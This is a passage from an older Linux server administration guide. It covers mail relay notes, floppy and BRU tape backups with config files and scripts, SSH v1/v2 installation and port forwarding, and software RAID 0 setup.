secure these communications? Check out the [ SSH ] in TrinityOS for full details!! NOTE #2: If you allow POP-3 access from anywhere on the Inet, 99% of your users will have trouble SENDING email via SMTP. A few reasons / solutions for this include: 1) They aren't physically connected behind your Linux server. Because of this, your Linux server's SMTP server doesn't want to relay NON-local user email traffic. There is one decent solution to this issue: Check out the "PopAuth" URL in [Section 5] for full details. 2) Another option to the above issue is to use POP-3 to -SEND- email instead of just receive it. Few POP-3 email clients support this but I know Qualcomm's Eudora supports it fine. 3) The POP-3 client is NOT configured with the "Return Address" as the domain name of your Linux SMTP server. Finally, if you have multiple Internet email domains (email addresses) running on one Linux server and you want to have different users to be able to send and receive email from the correct email address, etc. Check out the Virtual Email URL in [Section 5] ================================================================================ Section 29 - Backing up your box (minimum files to floppy and full backup to tape with BRU) Once you get your system up and running, its only a matter of time before you make a serious mistake, you get HD corruption, or a HD dies all together. COUNT ON IT! What can you do? At -=*LEAST*=- backup your core files onto a floppy disk and, better yet, get a tape drive and backup your machine to Tape, CD, etc. Using Floppies: --------------- Copying files to floppies is EASY. All you need to do is: - Format the floppy diskette: - Mount the floppy mount -t ext2 /dev/fd0 /mnt/floppy - Copy at least the following files to the floppy: /etc/passwd /etc/shadow /var/lib/rpm/fileindex.rpm /var/lib/rpm/packages.rpm - I would also recommend to record a full file listing of your system as well: ls -laR / | gzip -9 > /mnt/floppy/file-list-`date +'%b%d'`.lst.gz - Another GREAT idea comes from the Config-HOWTO to make a backup of your HD's Master Boot Record (MBR). So, instead of manually having to re-createit from your updated details in [Section 4], simply copy the MBR to a file: Example: this will backup /dev/hda's table: dd if=/dev/hda of=/mnt/floppy/MBR bs=512 count=1 Use this to restore the table: dd if=/mnt/floppy/MBR of=/dev/hda bs=446 count=1 ** You will need to redo this backup every time you: - Add a user - Change a user's password - Add/delete any RPMs to your machine - Make any serious changes to your file system layout Full backups using a Tape drive: -------------------------------- +-----------------------------------------------------------------------------+ | //// Prerequisits: \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| +-----------------------------------------------------------------------------+ | | | + Bru (tape software is installed). Check by using this command: | | | | whereis bru | | | | | | + Compiled a kernel to either support (at MINIMUM). Please see the | | Kernel Compiling Section for more details on how to do the following: | | | | * IDE tape drives | | | | Enhanced IDE/MFM/RLL disk/cdrom/tape/floppy support (CONFIG_BLK_DEV_IDE)| | Include IDE/ATAPI TAPE support (CONFIG_BLK_DEV_IDETAPE) | | | | or | | | | * your specific SCSI controller with SCSI tape support | | | | SCSI support (CONFIG_SCSI) | | SCSI tape support (CONFIG_CHR_DEV_ST) | | Verbose SCSI error reporting (kernel size +=12K) (CONFIG_SCSI_CONSTANTS)| | | | .....and for example, the Adaptec 1522 SCSI controller: | | Adaptec AHA152X/2825 support (CONFIG_SCSI_AHA152X) | | | | | | + A properly installed IDE (master/slave) or a SCSI tape drive | | (with proper SCSI IDs and termination) | | | | | | + Files created/edited: | | | | /usr/local/sbin/bru-fullbackup | | /etc/brutab | | /etc/bruxpat | | | +-----------------------------------------------------------------------------+ (Bru isn't free if you don't install Redhat or Caldera but its the best Linux backup software out there. This is one place you just CAN'T skimp!) If you don't want to use Bru, at least use CPIO instead of TAR. Tar does work fine UNTIL you hit an error on the tape. After that, tar will shutdown and you'll be screwed since it can't do data recovery. CPIO on the other hand can at least skip the bad file. NOTE: I've noticed that the behavior of BRU between v14.3 and 15.0 (Bru2000) is quite different. Still works though!) +-----------------------------------------------------+ | All the BRU documentation is available at: | | | | http://www.estinc.com/brumanual/toc.html | +-----------------------------------------------------+ **NOTE**: This is ONLY for users running anything LESS than Glibc-2.0.7-19: - To check , run "rpm -q glibc" - Edit /etc/profile and add your appropriate time zone above the "export" command (this is for the Pacific time zone): TZ=PDT Next, find the line that starts with "export" and add "TZ" to the end of it. Here is my "export" line: export PATH PS1 HOSTNAME HISTSIZE HISTFILESIZE USER LOGNAME MAIL NNTPSERVER TZ Next, you need to setup BRU to understand your tape drive. Personally, I would recommend to use ESTINC's setups at: http://www.estinc.com/brutabs.html Or, startup Xwindows and run "bruconfig" and configure it this way. --< /etc/brutab START>-- # BRUTAB Globals #+MAXWRITES=1000 #+RAWZBUFSIZE=500 #+RECYCLEDAYS=0 #+OVERWRITEPROTECT=YES #+ZBUFSIZE=5M # # Changed Zbufsize from 500k to 2M # Changes size from 4000MT to 8000MT # Changed bufsize from 32k to 64k #### NOTE!!! BRU tracks the size of uncompressed files by design. #### #### So.. when using either software or hardware compression, simply set #### the tape drive capacity size to ZERO in /etc/brutab (size=0). # Devices /dev/st0 devname="NS-8 Drive, 8GB, rewind" \ size=0MT bufsize=16k \ shmseg=10 shmmax=200k \ rawtape tape shmcopy rewind autoscan \ fmtcmd="mt -f /dev/st0 erase" \ rfmcmd="mt -f /dev/st0 fsf" \ bfmcmd="mt -f /dev/st0 bsf" \ retencmd="mt -f /dev/st0 reten" \ rewindcmd="mt -f /dev/st0 rewind" \ eodcmd="mt -f /dev/st0 seod" \ /dev/nst0 devname="NS-8 Drive, 4GB, norewind" \ size=0MT bufsize=16k \ shmseg=10 shmmax=200k \ rawtape tape shmcopy norewind noautoscan # # # # # # \ fmtcmd="mt -f /dev/st0 erase" \ rfmcmd="mt -f /dev/nst0 fsf 1" \ bfmcmd="mt -f /dev/nst0 bsf 1" \ retencmd="mt -f /dev/st0 retension" \ rewindcmd="mt -f /dev/st0 rewind" \ eodcmd="mt -f /dev/nst0 eod" \ # /dev/null device, useful for testing /dev/null devname="Bit Bucket" \ size=0 bufsize=20k \ norewind noautoscan - devname="stdin/stdout" \ size=0 bufsize=20k \ norewind noautoscan --< /etc/brutab END>-- Now we need to setup an exclude file so you don't backup things like CD-ROM drives or compress ZIP files, etc. First, backup the original file by doing "mv /etc/bruxpat /etc/bruxpat.orig" and then create this file and edit it to fit your needs: --< /etc/bruxpat Start>-- # Updated 03/09/99 to change the tape drive capacity to "0" for compression reasons # Updated 11/25/98 to add no compression of RAR files --dranch # Updated 7/23/98 to add Cdrom2-8 exclusion --dranch # Updated 6/14/98 to add [aA] for the ARJ multivolume stuff --dranch # # This file is used by -X option to provide an inclusion/exclusion # list. For each pathname of a file selected for backup, each line # of this file is examined for a pattern, and that pattern is applied # to the pathname. If the pattern matches, the appropriate action # is taken (the pathname is accepted or rejected). If the pathname # makes it through all the patterns it is accepted. # # These patterns will ONLY be applied to filenames that are part # of directories that are specified on the bru command line (or # the current directory, if none are specified). # # # Each command line in the bruxpat file (the file you are now reading) # consists of a control field and a pattern. The pattern # is separated from the control field by whitespace. Control field # characters are: # # i Include this pathname if pattern matches. The # pathname is accepted and no further patterns are # applied. # *** NOTE **** # It stops trying on the first pattern match found # and passes the filename. Since it scans patterns # in the order listed, "include" patterns normally # should be listed before any "exclude" patterns. # # x Exclude this pathname if pattern matches. The # pathname is rejected and no further patterns are # applied. # # z Exclude this pathname from compression if pattern # matches (if the -Z option is specified). # # s The pattern is a shell style wildcard pattern except # that '/' characters are not treated as special characters. # # r The pattern is a regular expression (same as used by the "grep" # command). # # l The pattern is a literal string. # # Exclude all core files xs */core xs core # Don't try to get the stuff in /proc xs /proc/* xs ./proc/* # Don't backup the CD-Rom xs /home/hpe/CDROMs/Cdrom0/* xs ./home/hpe/CDROMs/Cdrom0/* xs /home/hpe/CDROMs/Cdrom1/* xs ./home/hpe/CDROMs/Cdrom1/* xs /home/hpe/CDROMs/Cdrom2/* xs ./home/hpe/CDROMs/Cdrom2/* xs /home/hpe/CDROMs/Cdrom2/* xs ./home/hpe/CDROMs/Cdrom2/* xs /home/hpe/CDROMs/Cdrom3/* xs ./home/hpe/CDROMs/Cdrom3/* xs /home/hpe/CDROMs/Cdrom4/* xs ./home/hpe/CDROMs/Cdrom4/* xs /home/hpe/CDROMs/Cdrom5/* xs ./home/hpe/CDROMs/Cdrom5/* xs /home/hpe/CDROMs/Cdrom6/* xs ./home/hpe/CDROMs/Cdrom6/* xs /home/hpe/CDROMs/Cdrom7/* xs ./home/hpe/CDROMs/Cdrom7/* # Exclude all files and subdirectories in the temporary directories. # Handle files specified with relative and absolute pathnames # # -- NOTE -- the actual directory names will still be backed up, # only the files within the directories will be # excluded. #xs ./usr/tmp/* #xs /usr/tmp/* #xs ./tmp/* #xs /tmp/* # Don't compress files that end in ".z" or ".Z" zs *.[Zz] zs *.zip zs *.ZIP zs *.arj zs *.ARJ zs *.[Aa][0-9][0-9] zs *.[Rr][Aa][Rr] zs *.[Ra][0-9][0-9] zs *.[0-99] zs *.gz zs *.GZ zs *.gzip zs *.GZIP zs *.bz2 zs *.BZ2 zs *.tgz zs *.TGZ zs *.tar.gz zs *.tar.bz2 zs *.rpm zs *.RPM zs *.iso zs *.ISO zs *.mp3 zs *.MP3 zs *.asf zs *.ASF zs *.[Gg][Ii][Ff] zs *.[Jj][Pp][Gg] zs *.[Mm][Pp][Gg] -- Create the file /usr/local/sbin/bru-fullbackup with the following in it. NOTE: You might want to change the label field to your tape drive and proper date --< /usr/local/sbin/bru-fullbackup >-- #!/bin/sh clear # Edited 08/25/98 #HP TR4 SCSI Internal, 2.0.36, 486/160Mz/40MB, 4)IDE 3)RAID0, AHA1542 SCSI #------------------------------------------------------------------------ #02/09/99: wrote (3904000 KBytes), 3:28:00, 330 Kb/sec (effective) #02/09/99: autoscan (3904000 kbytes), 2:16:54, 475 Kb/sec echo "Setting enviroment vars" export BUFSIZE=16k export BRUTMPDIR=/tmp export BRUMAXWARNINGS=20000 #Only needed for old Glibc users #export TZ=PDT echo "Compressing old log files. This might take a while.." mv /var/log/bruexeclog /var/log/bruexeclog.`date +'%b%d'` mv /var/log/bru-log /var/log/bru-log.`date +'%b%d'` bzip2 -9f /var/log/bru-log.`date +'%b%d'` echo "Starting BRU full backup with exclusions, compression, user intervention" # Do not use -j, -m, bru -c -vvvv -V -X -Z -G -L "Hp Tr4 11/27/98 - FULL" -f /dev/st0 / > /var/log/bru-log #Only needed for old Glibc users #export TZ=PST8PDT # v8.8.98 # See /etc/bruhelp for A LOT of more details... # # Defaults to backing up "/" # # -c : create (autoscan verification on by default) # : - if you specify -i or -d, autoverify is disabled # # -d : file comparison (normal) # -dd : file comparison access mod, lenths, symlinks, ID groups # -dddd : file comparison - narly # # -e : Estimate archive size # # -f : select regular input device (same as -r) # # -g : Read : Dumps the header block # -gg : Read : Generates ted cmd line, label, date, time, release, # # -h : Print this help information # # -i : inspect a archive *checksum of a directory) # : Not needed with "-v" # # -r : Backup a raw partition # # -t : List archive table of contents for files # # -u - use selected files # a - all files # b - block special files # c - character (special files) # d - dirs # l - syms # p - fifos # r - reg # # -vvvv : Level 4 verbosity # # -w : confirmation of each file # # : wildcard expantion [must be placed in double quotes] # -x : restore # # -G : Write a archive list (header block) at beginning of # -L : Label the tape # -B : disabled user intervetion # -D : Enabled double buffering for faster throughput # -Z : compression # -V : execution summary w/o volume # -X : Exclude specific files # # bru -gg -f /dev/st0 : Display archive contents if written # #bru -vv -t -f /dev/st0 : Display entire contents of archive tape # #bru -x -vvvv /user/dranch/* # # Also, these enviroment variables are available in /etc/brutab # # Global BRU settings # #+OVERWRITEPROTECT=YES #+RECYCLEDAYS=180 #+MAXWRITES=200 #+ZBUFSIZE=512k #+SHELL=/bin/sh #+BRUTABONLY=no #+DEVNAMECHECK=no #+MATCHLEVEL=2 #+MAXFILENAMELEN=255 #+READCHECKLEVEL=1 #+BRUHELP=/bru/bruhelp #+BRUMAXWARNINGS=1000 #+BRUMAXERRORS=500 #+BRUXPAT=/etc/bruxpat #+BRURAW=/etc/bruraw #+BRUSMARTREST=/etc/brusmartrest #+BRUREMOVELOG=/var/adm/bruremovelog #+BRUTMPDIR=/tmp --< /usr/local/sbin/bru-fullbackup End.> - Ok.. go ahead and insert a tape in the tape drive and run "/usr/local/sbin/bru-fullbackup" I usually also run "tail -f /var/log/bru-log" in another TTY to watch the progress of the backup. - Once your backup is completed, you need to verify that you can read the files OFF the tape, restore files to different places, and also restore files back to their ORIGINAL location: -- Based on an email from the BRU mailing list: The techniques differ depending on how the backup was created (absolute [/] or relative [.]). Using I use "/" as a backup point, we are using absolute paths so (assuming you have a tape with full backups as well): - Restore the /etc/passwd file to a different location (/tmp): cd /tmp bru -xvf /dev/st0 -PA /etc/passwd * the trick is "-PA" which translates absolute to relative Now test that the files are the same: diff /etc/passwd /tmp/passwd - Restore the /bin/fullbru file to the same location (/bin): mv /bin/fullbru /bin/fullbru.save bru -xvf /dev/st0 /bin/fullbru - Now test that the files are the same: diff /bin/fullbru.save /bin/fullbru - Once you are convinced that you have a good backup, now its time to create a rescue diskette. - Download the BRU rescue diskette from: ftp://ftp.estinc.com/pub/linux/Bootkit-1.01.tar.gz - Here are a few other scripts that I find useful with Bru: --< /usr/local/sbin/bru-viewtape >-- #!/bin/sh clear #echo "Starting BRU to view tape contents" bru -gg -f /dev/st0 > /var/log/bru-tape-contents.`date +'%b%d'` 2>&1 ---- --< /usr/local/sbin/bru-find-changes >-- #!/bin/sh clear # Edited 01/06/99 echo "Setting enviroment vars" export BUFSIZE=16k export BRUTMPDIR=/tmp export BRUMAXWARNINGS=20000 #export TZ=PDT echo "Starting BRU to find all changed/missing files between tape and disk.." bru -dd -f /dev/st0 / > /var/log/bru-diff-del-find-log.`date +'%b%d'` 2>&1 ---- --< /usr/local/sbin/bru-restore >-- #!/bin/sh clear # Edited 03/09/99 # # NOTE: This script is run as: "/usr/local/sbin/bru-restore /home/username" # where the "/home/username" is the path and/or the full path and filename # of the data you want to restore. Bru will then find this data on the # tape and restore it to its original location. If you want to restore # the file to a DIFFERENT location, please consult the manual for # "absolute to relative path translation" # echo "Setting enviroment vars" export BUFSIZE=16k export BRUTMPDIR=/tmp export BRUMAXWARNINGS=20000 #export TZ=PDT echo "Compressing old log files. This might take a while.." mv /var/log/bru-restore-log /var/log/bru-restore-log.`date +'%b%d'` mv /var/log/bruexeclog /var/log/bruexeclog.`date +'%b%d'` bzip2 -9f /var/log/bru-restore-log.`date +'%b%d'` echo "Starting BRU partial restore " # Do not use -j, -m, bru -x -vvvv -f /dev/st0 $1 > /var/log/bru-restore-log ---- Using a CD-R or CD-R/W drive: ----------------------------- See [Section 39] for full details. ================================================================================ ================================================================================ Section 30 - SSH v1/2 Terminal, FTP, X-windows, and tunnel encryption SSH is both a protocol and program suite that allows for ENCRYPTED communictions. For me, I always use SSH because if I was to login with normal versions of TELNET, FTP, POP-3, etc, all of my my username/passwords (and all following traffic) would go over the Internet in CLEAR-TEXT. * THIS IS BAD! * Why is this bad? For example, if some evil person was between your local machine and your POP-3 server was sniffing packets, not only would they be able to get your username/password but also get all of your transmitted email too! Now you might be thinking this is paranoid thinking but securing your connections isn't hard and you shouldb e better safe than sorry. Using SSH, ALL traffic is then encrypted. Plus.. it can acutally speed things up with the use of built-in SSH compression! ------------------------------------------------------------------------ NOTE: SSH now comes in two flavors. Version 1 and Version 2 v1 - is very good and is supported by other clients like Van Dyke's SecureCRT v2.x for Windows. It also supports both the fast Blowfish and IDEA ciphers (encryption engines). The major benefit of SSHv1 is that it is completely free for both endusers and commercial companies. SSH v2 also supports encrypted file transfers unlike v1. A work around for this is to use something like Zmodem over a SSHed TELNET connection via clients like SecureCRT. So why is there a V2? At one time, there were some flaws in it and thus SSH V1 was discontinued. But, people complained that v1 could be fixed and the licensing of v2 was too restrictive. Because of this, both v1 and v2 versions of SSH are alive and well. v2 - is a stronger version of SSH. Unfortunately, SSH v2 does not support the fast Blowfish or IDEA ciphers but the other ciphers aren't much slower. BUT.. the licensing for SSHv2 doesn make it free for commercial or educational use. So, many companies are still using SSHv1. Unfortunately, most SSH v1 clients (like SecureCRT v2.x for Windows) -CANNOT- connect to a v2 server unless the server is compiled up to support "compatibility" mode. Please note that SecureCRT v3.x now supports both SSHv1 and SSHv2. Yet, one great new thing about the new v2 SSH is that it comes with a SSHed -FTP- client (sftp) now! With this feature, users won't have to use things like Zmodem over SSHed TELNETs for secured file transfers. ------------------------------------------------------------------------ For now, I *recommend* to support the compatibility mode to support both SSH v1 and v2 clients. NOTE: I have personally noticed that when connecting to SSHv2 servers in Compatibility mode, the initial connection time until you receive a prompt is SIGNIFICANTLY slower than SSH v1 servers. Oh well. -- ------------------------------------------------------------------------- Please NOTE: The following example shows how to install both SSHv1 and SSHv2 to support both types of connections. If you don't want to run SSHv1 (because its old) or SSHv2 (because of licensing issues), simply skip that section. ------------------------------------------------------------------------- - Goto the SSH archive shown in [Section 5] and download the newest versions of BOTH the v1 and v2 SSH servers (these archives also include the Unix SSH client too) - Un-tar both v1 and v2 SSH server/client archives by running "tar -xzf ssh-1.2.x.tar.gz" "tar -xzf ssh-2.0.x.tar.gz" - Now do the following. NOTE: If you want to support both SSH v1 and v2 clients, you MUST install SSH v1 first. For SSH v1 server support: "cd ./ssh-1.2.27" "./configure --with-libwrap --disable-suid-ssh" ------------------------------------------------------------ This tells SSH to set itself up for this particular hardware setup with: - support TCP wrappers as configured in /etc/hosts.* - to NOT install itself as SUID root ------------------------------------------------------------ "./make clean" "./make" "./make install" For SSH v2 server support: "cd ./ssh-2.0.13" "./configure --with-libwrap --disable-suid-ssh" ------------------------------------------------------------ This tells SSH to set itself up for this particular hardware setup with: - support TCP wrappers as configured in /etc/hosts.* - to NOT install itself as SUID root ------------------------------------------------------------ "./make clean" "./make" "./make install" NOTE: The "make install" command might take some time (key generation does 7 passes) and time per pass depends on your Linux box's CPU power. - Next, you need to have the SSH daemon load upon every reboot. Basically, there are two ways to do it. One is the SysV way (Redhat, Solaris, etc) or the BSD way (Slackware, SuSe, etc) which was the original way that it was documented in TrinityOS. Please see the middle portition of [Section 8] for full details. NOTE: When loading the SSH daemon, lower the "xx" numbers Sxx.sshd or eariler in the rc.local, the faster the box will come back up with SSH support after a reboot. For me with a CD-ROM changer, if the SSHd damon is below the rc.cdrom file, I have to wait until all 7 CD-ROMs are mounted before SSHd begins to load! A slow process indeed! For SysV machines (Redhat, etc): -------------------------------- /etc/rc.d/init.d/sshd -- #!/bin/bash # # /etc/rc.d/init.d/sshd # # sshd Start the Secure Shell daemon # # chkconfig: 345 12 12 # description: The Secure Shell daemon, versions 1 and 2, allows for strong \ # authentication, encrypted communications and tunnels with \ # remote clients also using SSH. # processname: sshd # pidfile: /var/run/sshd.pid # config: /etc/sshd_config # Source function library. . /etc/rc.d/init.d/functions SSHD=/usr/local/sbin/sshd SSHD_CONFIG=/etc/sshd_config case "$1" in start) echo -n "Starting SSH services: " if [ -x $SSHD -a -f $SSHD_CONFIG ] then daemon $SSHD else echo_failure fi echo touch /var/lock/subsys/sshd ;; stop) echo -n "Shutting down the SSHd daemon: " killproc sshd echo rm -f /var/lock/subsys/sshd ;; status) status sshd ;; restart) $0 stop; $0 start ;; reload) killall -HUP sshd ;; *) echo "Usage: sshd {start|stop|status|reload|restart}" exit 1 ;; esac -- To activate this new script, run the following command: "chkconfig --level 345 sshd on" ------------------------------------------------------------------- For BSD machines (Slackware, etc): -------------------------------- Edit the following file and put the text toward the TOP of the file: /etc/rc.d/rc.local -- echo "Starting sshd v2 with Compatibility mode..." /usr/local/sbin/sshd -- - Now, edit "/etc/services", find where port "22" should go and add this line (if it isn't there already): -- ssh 22/tcp -- ***** If you installed SSH v2.x but STILL want to support SSH v1 clients (like SecureCRT), etc, do the following: - edit /etc/ssh2/sshd2_config and either verify or add the following lines to the section that is under "*:". If any of the following lines do exist but have a "#" in front of it, delete the "#" and edit the line to look as follows: /etc/ssh2/sshd2_config -- Ssh1Compatibility yes Sshd1Path /usr/local/sbin/sshd1 -- It should also noted that if you are concerned with absolute security and don't need the following function, I recommend to do the following: /etc/ssh2/sshd2_config -- #If you don't need SSH tunnels, disable it by putting a "#" #in front of the line: ForwardAgent yes #If you don't need X11 SSH forwarding, disable it by putting # a "#" in front of the line: ForwardX11 yes -- - I also recommend to disable the ability to login via SSH1/2 as root. To do this, edit the following files and change them to read: /etc/ssh2/ssh2d_config -- PermitRootLogin no -- - Next, edit /etc/sshd_config -- PermitRootLogin no -- - Next, edit /etc/ssh2/ssh2_config and either verify or add the following lines to the "*:" section. If the line does exist but there is a "#" in front of it, delete the "#" /etc/ssh2/ssh2_config -- Ssh1Compatibility yes Ssh1Path /usr/local/bin/ssh1 -- - Next, I would recommend to add the following line towards the bottom of /etc/bashrc: alias ssh='/usr/local/bin/ssh -C -P -c blowfish' What this does is when you SSH out of the Linux box itself, SSH will: - Use Compression if possible - Disable the R-tools emulation of using ports < 1024 - Use the Blowfish codec. Why Blowfish codec vs. say 3DES? Because its FASTER. Please note that for this alias to take effect, you will have to log out and then re-login. - Now you need to either load or RE-load the SSH server. - If you don't currently have a SSHd server running, simply type in: /usr/local/sbin/sshd - If you DO already have a SSH v1 server running, things get a little more complicated: - You need to either login to the console of the Linux server or TELNET (yes.. TELNET and not SSH) into your Linux box. Also, if you are going to TELNET in and running a strong firewall ruleset, you'll have to allow TELNET into your firewall. - Now, login to your box WITHOUT SSH and kill the running SSHd process: kill -HUP `ps aux | grep sshd | grep -v -e grep | awk '{print $2}'` - Finally, restart the SSHd process /usr/local/sbin/sshd - Thats it! The SSH server should be running now! So load up your SSH client and try it out. - To SSH from your Linux box, just run "ssh xyz" where "xyz" is the remote SSH-enabled server's fully qualified domain name. Problems: 1. Make sure that if you are using a IPFWADM/IPCHAINS firewall, that port 22 is allowed IN and OUT. 2. Make sure that if you are using TCP Wrappers, that SSH access is allowed in from the requesting remote machine. ------------------------------- FULL SSH port forwarding! ------------------------------- UNIX access: ------------ * Here is how you can configure a SSH client for secure IMAP, SNMPT, and LDAP access through a SSH tunnel. Also know that other people can setup these tunnels to YOUR SSH server if they have the proper access. NOTE: One VERY cool thing about this setup is that the server that has the SSH server does NOT have to be the server you need to access. The SSH server can actually terminate the tunnel on the internal network and then forward the traffic to the require INTERNAL server. Very cool. To setup this tunnel, I created a script called "start-tunnel". This script assumes that "some.remote-ssh-server.com" is the SSH server and that "some.internal-mail-server.com" is the internal server that you ultimately want to connect to. start-tunnel -- echo Forward IMAP, LDAP, SMTP to allegro /usr/local/bin/ssh.old -C -P johnjoe@some.remote-ssh-server.com \ -L 143:some.internal-mail-server.com:143 \ -L 25:some.internal-mail-server.com:25 \ -L 389:some.internal-mail-server.com:389 sleep 7200 -- Lets break this out: 1) this example uses the older SSHv1 client. If you get an error like: "Executing /usr/local/bin/ssh1 for ssh1 compatibility. Bad forwarding specification '143'." This means that the remote SSH server is NOT supporting SSHv2. So, this is why I hard coded it to use SSHv1. 2) -C means use compression 3) -P means to NOT use ports less that 1024 (privledged ports) 4) "johndoe" is the login on the remote SSH server 5) "some-remote-ssh-server.com" is the remote SSH server 6) "-L 143 some.internal-mail-server.com:143" means: A) I want to forward all LOCALHOST traffic to port 143 B) Send this traffic to "some.internal-mail-server.com" on port 143 NOTE: If you didn't catch that, it will be forwarding ****** your LOCALHOST traffic on port 143 to that remote server. SO, if you were originally configuring your IMAP client to directly connect to "some.internal-mail-server.com", you will now have to re-configure it to connect to "localhost". Weird huh? Once the SSH tunnel comes up, it will work completely transparently. 7) Repeate the forwards for SMTP and LDAP as well 8) Like RSH, SSH will execute the command "sleep 7200" on the remote server. So, after 7200 seconds or 2 hours, the tunnel will shut down. * For other UNIX examples, please see the SSH section in Section 5: Windows access: --------------- - If you are looking for a great SSH client for Windows, check out SecureCRT at http://www.vandyke.com. Here is an example how to setup SecureCRT perfectly for Linux. ----------- NOTE: This SCRT configuration example shows how to configure SecureCRT to both enable SSH encrypted communications to the remote host but also enable transparent SSH port forwarding for ALL POP-3 and communications to that same given server. If you also want to encrypt additional protocols like IMAP4, etc.. just use this configuration as this as a template. Please note that to enable SSH port forwarding, a normal SecureCRT SSH connection needs to be established FIRST to your remote server. Once the SSH connection is running, all POP-3, etc communications will be transparently encrypted! You won't even notice its doing it. Once the SSH connection is down, all POP-3, etc communications will break because the given POP-3, etc clients must be reconfigured to connect to IP address 127.0.0.1. More on this in a moment. ----------- - File --> Quick Connect --> "Session list" tab --> New - Enter in the name of a SSH site to connect to - Change the protocol to "SSH" - Enter in the fully qualified domain name of the remote site - Verify the port is set to "22" - Enter in your username for the remote site - Change the Cipher to "blowfish" - Change the authentication to "password" I would also recommend to do the following: Session-->Advanced--> General tab: - Enable "Use Compression" at a level of 5 Port Forwarding: - Click on the NEW button - Local port: 110 - Remote Hostname: roadrunner.acme123.com - Remote port: 110 - Save - Enable "Forward X11 packets" - Save Emulation - vt102 and enable ANSI color - Change the Scollback buffer to "9999" Options - DISABLE "Scroll to bottom on output" - You have to do one last thing for SSH forwarded connections. You need to reconfigure your POP-3 client, say Netscape or Eudora, to connect to 127.0.0.1 and -NOT- your normal POP-3 server. What this does is the POP-3 client will conenct to 127.0.0.1 (localhost on your local machine) and then SecureCRT will SSH it and forward it over the first configured instance of SCRT with port 110 forwarded. NOTE: If you have multiple POP-3 clients running, this will be a problem since you can't port forward port 110 twice. To fix this, you will have change the POP-3 client to use a different port other than port 110 (say port 123) and then configure that SCRT sesstion profile to SSH forward port 123 to remote port 110. Get it? NOTE2: SSH port forwarding does NOT work well with ACTIVE-style ftp connections. Re-configure your FTP clients to use PASV connections on port 21 and then SSH'ed FTPs will work ok. ------------ - That's it. From S-CRT, go ahead and try connecting to your remote SSH server and you should be prompted with a dialog box asking to "Accept and save" the keypair. Click on "OK". Now you should be prompted to enter in your password and you should now login over an SSH encrypted connection! With the SSH connection running, now all your POP-3 traffic will also be transparently encrypted to make your username/password and files safe from prying eyes. ================================================================================ ================================================================================ Section 31 - Software RAID 0 (striping) Hard drives ================================================================================ If you didn't notice in Section [4], Roadrunner now has (7) hard drives and (2) CD-ROMS running on it now. Four IDE HDs are in the main system case and the other (3) SCSI HDs and (1) tape drive is in a secondary AT computer case. To pull this off, I ordered a cable that has (2)external HD50pin SCSI-2-Fast connectors with 8 internal SCSI 50-pin internal ribbon cable connectors. I bought this from www.corpsys.com [part num: SCSI28] for ~$59. I then used one of my old AT-style cases with its power supply. With all this, I now have a external RAID box! Cool huh? Anyway, the following section will tell you how to implement RAID 0 (Striping) in software. Changing the configs to Linear, Raid1, or Raid5 won't be hard as long as you can afford the lost capacity or afford the extrs disks. -- - Download ALL the various version of the RaidTools from the URL in [Section 5] The reason to download ALL of the available versions is that I've noticed that some of the newer versions would NOT compile. Other versions didn't have all the docs, etc. Raidtools is in a sad state right now but it DOES work once you put together a working hodge-podge. NOTE: You will notice that there is a Software-RAID HOWTO on the various Linux mirrors and in the RaidTools's archive itself. Though its a strong doc on what is RAID, how do the different levels differ, how to recover from various failures, etc.. it's NOT a HOWTO. Its much more like a FAQ.. and personally.. I found it extreamly difficult to read and follow. Anyway.. from here on out, assume I'm using Raidtools-0.50 - download and install the newest available kernel (2.0.35) into /usr/src/linux - run "make config" (if you haven't already done this as shown in Section 11) - Configure the kernel as you normally would but, in the HD hardware support section, enable the following: Multiple devices driver support (CONFIG_BLK_DEV_MD) [Y/n/?] Linear (append) mode (CONFIG_MD_LINEAR) [Y/m/n/?] RAID-0 (striping) mode (CONFIG_MD_STRIPED) [Y/m/n/?] RAID-1 (mirroring) mode (CONFIG_MD_MIRRORING) [Y/m/n/?] RAID-4/RAID-5 mode (CONFIG_MD_RAID5) [Y/m/n/?] - Now run "make dep; make clean; make bzImage; make modules; make modules_install" and compile up the kernel. - Now, install the kernel into lilo, Loadlin, etc and reboot (shown in Sections 13 & 14). - Once the box has rebooted, decompress raidtools-0.50 (tar -xzvf) - Run "./configure" - Run "make all" - run "make install" - Now you need to edit your init files to properly bring up the md0 service. !!!NOTE!!! These configs ASSUME that the partitions to be raided are /dev/hdb1, /dev/hdd1, /dev/sdc1, and /dev/sdd1. Modify your configs to reflect your own enviroment!!! - Create the following file: /etc/rc.d/rc.raid -- #!/bin/sh # See how we were called. case "$1" in start) /sbin/mdadd /dev/md0 /dev/hdd1 /dev/sdb1 /dev/sdc1 echo "Disks added" /sbin/mdrun -p0 /dev/md0 echo "Raid -RAID0- started on /dev/md0" ;; manual) /sbin/mdadd /dev/md0 /dev/hdd1 /dev/sdb1 /dev/sdc1 echo "Disks added to /dev/md0" /sbin/mdrun -p0 /dev/md0 echo "Raid RAID0 started on /dev/md0" /bin/mount -t ext2 /dev/md0 /home/hpe/RAID0 ;; stop) echo "/dev/md0 umounted" /bin/umount /dev/md0 echo "/dev/md0 stopped" /sbin/mdstop /dev/md0 ;; *) echo "Usage: rc.raid {start|stop}" exit 1 esac exit 0 -- Once you have created this script file, make it executable by running "chmod 700 rc.raid" +++ Redhat users, edit /etc/rc.d/rc.sysinit (find the following lines and insert the following lines (around line 159): /etc/rc.d/rc.sysinit -- if [ -x /sbin/kerneld -a -n "$USEMODULES" ]; then if [ -f /proc/sys/kernel/modprobe ]; then # /proc/sys/kernel/modprobe indicates built-in kmod instead echo "/sbin/modprobe" > /proc/sys/kernel/modprobe else /sbin/kerneld KERNELD=yes fi fi # Start the initialization of the MD0 RAID service /etc/rc.d/rc.raid start # Check filesystems if [ ! -f /fastboot ]; then echo "Checking filesystems." fsck -R -A -V -a $fsckoptions . . . -- +++ Slackware users, edit the /etc/rc.d/rc.S file, find the following text and append the following: /etc/rc.d/rc.S -- # remove /etc/mtab* so that mount will create it with a root entry /bin/rm -f /etc/mtab* /etc/nologin /var/run/utmp \ /etc/shutdownpid /var/run/*.pid # Start the initialization of the MD0 RAID service /etc/rc.d/rc.raid start -- All Distros: edit the /etc/fstab file and append the following line to somewhere in the main body) -- /dev/md0 /home/hpe/RAID0 ext2 defaults 1 2 -- - Ok.. thats the meat of it. So now lets get this setup and formatted - Go ahead and type in "/etc/rc.d/rc.raid start" - If you get any errors about /dev/md0 not existing, run the command "/dev/MAKEDEV md0" and the run the script again. Yes.. use the 